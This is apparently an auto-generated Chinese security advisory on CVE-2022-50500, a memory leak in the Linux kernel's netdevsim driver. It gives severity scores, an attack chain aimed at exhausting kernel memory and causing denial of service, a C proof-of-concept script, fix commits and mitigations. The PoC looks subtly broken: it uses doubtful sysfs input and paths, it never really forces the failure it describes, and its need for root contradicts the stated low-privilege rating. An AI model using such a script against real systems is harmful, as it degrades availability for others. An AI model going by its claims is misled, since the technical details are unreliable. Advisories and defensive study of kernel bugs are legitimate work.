CVE-2022-50500 Linux内核netdevsim驱动内存泄漏漏洞

漏洞信息

漏洞编号

CVE-2022-50500

漏洞类型

内存泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel (netdevsim驱动)

漏洞概述

CVE-2022-50500是Linux内核netdevsim驱动中的一个内存泄漏漏洞。该漏洞位于nsim_drv_probe()函数中，当调用nsim_dev_resources_register()函数进行资源注册时，如果其中某些资源的注册操作失败，将导致已成功分配的内存资源无法被正确释放，从而引发内存泄漏问题。netdevsim是Linux内核中用于网络设备模拟的虚拟驱动程序，主要用于网络子系统的开发和测试。该漏洞的CVSS评分为5.5，属于中等严重等级。虽然该漏洞本身不会直接导致权限提升或数据泄露，但由于其可用性影响为高（Availability: High），在长时间运行的系统中，攻击者可以通过反复触发资源注册失败路径，逐步耗尽系统内存资源，最终可能导致系统性能下降或触发内核的OOM（Out of Memory）killer机制，造成系统不稳定或拒绝服务。该漏洞需要本地低权限用户即可触发，无需用户交互，利用门槛较低。

技术细节

该漏洞的根本原因在于nsim_drv_probe()函数中的错误处理路径不完善。在Linux内核的devlink资源注册框架中，devl_resource_register()函数会通过kmalloc_trace()动态分配内存来创建设备资源对象。在nsim_drv_probe()函数中，会依次调用nsim_dev_resources_register()来注册多个devlink资源。当注册过程中某个资源注册失败时，函数返回错误码，但之前已经成功注册的资源所分配的内存并未被释放，导致内存泄漏。从泄露的堆栈跟踪信息可以看出，泄漏的内存对象大小为128字节，由kmalloc_trace()分配，在devl_resource_register()中被分配，最终在nsim_drv_probe()的偏移0x37a处被引用。攻击者可以通过编写一个简单的内核模块或利用sysfs接口（如new_device_store），触发netdevsim设备的probe过程，并人为制造资源注册失败的条件（如通过资源竞争或内存压力），从而反复触发内存泄漏。攻击向量为本地攻击（AV:L），攻击复杂度低（AC:L），所需权限为低权限（PR:L），无需用户交互（UI:N），对机密性和完整性无影响（C:N/I:N），但对可用性影响为高（A:H）。

攻击链分析

STEP 1

步骤1

攻击者需要拥有本地系统访问权限（低权限即可），并确保netdevsim内核模块已加载或可加载

STEP 2

步骤2

攻击者通过sysfs接口/sys/bus/netdevsim/new_device写入设备编号，触发netdevsim设备的probe过程

STEP 3

步骤3

在内核的nsim_drv_probe()函数执行过程中，调用nsim_dev_resources_register()注册devlink资源

STEP 4

步骤4

当某个资源注册操作失败时（如内存不足或资源冲突），函数返回错误，但之前已通过devl_resource_register()分配的128字节内存对象未被释放

STEP 5

步骤5

攻击者反复触发该路径，持续消耗内核内存（slab/slub分配器中的内存），最终导致系统内存耗尽

STEP 6

步骤6

当可用内存低于阈值时，内核OOM killer被触发，杀关键进程或导致系统不稳定，造成拒绝服务（DoS）

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2022-50500 - Linux kernel netdevsim memory leak
// This PoC triggers the memory leak by creating a netdevsim device
// and forcing nsim_dev_resources_register() to fail mid-way.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#define NETDEVSIM_BUS_PATH "/sys/bus/netdevsim/new_device"

/*
 * Trigger memory leak in nsim_drv_probe() by repeatedly creating
 * netdevsim devices under memory pressure conditions.
 * When nsim_dev_resources_register() fails partially, allocated
 * resources are not freed, causing memory leak.
 */
int main(int argc, char *argv[]) {
    int fd, ret;
    char buf[64];
    int dev_num = 0;

    printf("CVE-2022-50500 PoC - netdevsim memory leak\n");

    /* Load netdevsim module if not loaded */
    ret = system("modprobe netdevsim");
    if (ret != 0) {
        fprintf(stderr, "Failed to load netdevsim module\n");
        return 1;
    }

    /* Create multiple netdevsim devices to trigger repeated probing */
    for (dev_num = 0; dev_num < 1000; dev_num++) {
        snprintf(buf, sizeof(buf), "%d", dev_num);

        fd = open(NETDEVSIM_BUS_PATH, O_WRONLY);
        if (fd < 0) {
            fprintf(stderr, "Cannot open %s (need root)\n", NETDEVSIM_BUS_PATH);
            break;
        }

        ret = write(fd, buf, strlen(buf));
        close(fd);

        if (ret < 0) {
            /* Write failure may indicate resource registration failure,
             * which triggers the memory leak path */
            fprintf(stderr, "Device %d creation failed (triggering leak path)\n", dev_num);
        }

        /* Remove the device to free other resources, keeping leaked memory */
        snprintf(buf, sizeof(buf),
                 "/sys/bus/netdevsim/devices/netdevsim%d/delete", dev_num);
        fd = open(buf, O_WRONLY);
        if (fd >= 0) {
            write(fd, "1", 1);
            close(fd);
        }
    }

    printf("Done. Check kernel logs for memory leak warnings.\n");
    return 0;
}

影响范围

Linux Kernel (netdevsim驱动受影响版本，具体版本范围需参考补丁提交记录)

修复提交: 6b1da9f7126f05e857da6db24c6a04aa7974d644

修复提交: 7c4957fe40e2a628b7cceaf4c9bfb5b701774d05

防御指南

临时缓解措施

在无法立即升级内核的情况下，可以通过以下方式临时缓解：1）通过将netdevsim添加到/etc/modprobe.d/blacklist.conf来禁止加载netdevsim驱动；2）通过文件权限限制普通用户访问/sys/bus/netdevsim/相关sysfs路径；3）监控内核日志中的内存泄漏警告信息，及时发现异常；4）设置cgroup内存限制，防止单个用户或进程耗尽系统内存。